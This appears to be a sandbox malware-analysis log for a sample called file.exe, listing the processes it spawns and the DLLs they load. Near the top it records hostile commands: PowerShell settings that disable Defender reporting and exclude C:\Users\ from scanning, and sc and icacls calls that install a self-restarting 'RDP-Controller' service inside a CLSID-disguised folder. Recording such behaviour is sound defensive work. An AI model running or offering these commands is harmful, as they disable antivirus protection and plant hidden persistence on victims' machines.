Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.aclJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 5654528 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x43c600
Source: Binary string: RfxVmt.pdb source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
Source: Binary string: RfxVmt.pdbGCTL source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
